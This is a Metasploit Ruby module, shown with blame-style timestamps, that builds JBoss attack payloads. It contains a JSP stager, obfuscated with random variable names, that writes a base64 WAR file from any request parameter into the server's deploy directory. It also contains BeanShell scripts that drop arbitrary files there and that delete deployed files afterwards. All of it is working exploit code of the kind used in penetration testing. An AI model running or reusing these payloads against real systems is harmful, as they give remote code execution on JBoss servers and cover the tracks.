2014-08-01 19:28:26 +00:00
|
|
|
# -*- coding: binary -*-
|
|
|
|
|
module Msf::HTTP::JBoss::BeanShellScripts
|
2014-08-18 16:19:37 +00:00
|
|
|
|
|
|
|
|
# Generate a BSH script
|
|
|
|
|
# @param opts [Hash] Hash of configuration options.
|
|
|
|
|
# @return [String] A BSH script
|
2014-08-01 19:28:26 +00:00
|
|
|
def generate_bsh(type, opts ={})
|
|
|
|
|
bean_shell = nil
|
|
|
|
|
case type
|
|
|
|
|
when :create
|
|
|
|
|
bean_shell = create_file_bsh(opts)
|
|
|
|
|
when :delete
|
|
|
|
|
bean_shell = delete_files_bsh(opts)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
bean_shell
|
|
|
|
|
end
|
|
|
|
|
|
2014-08-18 16:19:37 +00:00
|
|
|
# Generate a stager to write the exploded WAR file to the deploy/
|
2014-08-01 19:28:26 +00:00
|
|
|
# directory. This is used to bypass the size limit for GET/HEAD requests
|
2014-08-18 16:19:37 +00:00
|
|
|
# @param [String] The name of the app to deploy
|
|
|
|
|
# @return [String] The jsp stager
|
2014-08-01 19:28:26 +00:00
|
|
|
def stager_jsp(app_base)
|
|
|
|
|
decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
|
file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
|
jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
|
fos_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
|
content_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
|
|
|
|
|
|
stager_jsp = <<-EOT
|
|
|
|
|
<%@page import="java.io.*,
|
|
|
|
|
java.util.*,
|
|
|
|
|
sun.misc.BASE64Decoder"
|
|
|
|
|
%>
|
|
|
|
|
<%
|
|
|
|
|
String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
|
|
|
|
|
String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
|
|
|
|
|
try {
|
|
|
|
|
String #{content_var} = "";
|
|
|
|
|
String parameterName = (String)(request.getParameterNames().nextElement());
|
|
|
|
|
#{content_var} = request.getParameter(parameterName);
|
|
|
|
|
FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
|
|
|
|
|
byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
|
|
|
|
|
#{fos_var}.write(#{decoded_var});
|
|
|
|
|
#{fos_var}.close();
|
|
|
|
|
}
|
|
|
|
|
catch(Exception e){ }
|
|
|
|
|
%>
|
|
|
|
|
EOT
|
|
|
|
|
|
|
|
|
|
stager_jsp
|
|
|
|
|
end
|
|
|
|
|
|
2014-08-18 16:19:37 +00:00
|
|
|
# Generate a BSH script to deploy the WAR
|
|
|
|
|
# @param opts [Hash] Hash of configuration options.
|
|
|
|
|
# @return [String] A BSH script to deploy the WAR
|
2014-08-01 19:28:26 +00:00
|
|
|
def create_file_bsh(opts = {})
|
|
|
|
|
dir = opts[:dir]
|
|
|
|
|
file = opts[:file]
|
|
|
|
|
contents = opts[:contents]
|
|
|
|
|
|
|
|
|
|
payload_bsh_script = <<-EOT
|
|
|
|
|
import java.io.FileOutputStream;
|
|
|
|
|
import sun.misc.BASE64Decoder;
|
|
|
|
|
|
|
|
|
|
String val = "#{contents}";
|
|
|
|
|
|
|
|
|
|
BASE64Decoder decoder = new BASE64Decoder();
|
|
|
|
|
String jboss_home = System.getProperty("jboss.server.home.dir");
|
|
|
|
|
new File(jboss_home + "/deploy/#{dir}").mkdir();
|
|
|
|
|
byte[] byteval = decoder.decodeBuffer(val);
|
|
|
|
|
String location = jboss_home + "/deploy/#{file}";
|
|
|
|
|
FileOutputStream fstream = new FileOutputStream(location);
|
|
|
|
|
fstream.write(byteval);
|
|
|
|
|
fstream.close();
|
|
|
|
|
EOT
|
|
|
|
|
|
|
|
|
|
vprint_status("Creating deploy/#{file} via BSHDeployer")
|
|
|
|
|
payload_bsh_script
|
|
|
|
|
end
|
|
|
|
|
|
2014-08-18 16:19:37 +00:00
|
|
|
# Generate a BSH script to delete an application
|
|
|
|
|
# @param opts [Hash] Hash of configuration options.
|
|
|
|
|
# @return [String] A BSH script to delete an application
|
2014-08-01 19:28:26 +00:00
|
|
|
def delete_files_bsh(opts = {})
|
|
|
|
|
script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n"
|
|
|
|
|
opts.values.each do |v|
|
|
|
|
|
script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
script
|
|
|
|
|
end
|
|
|
|
|
end
|
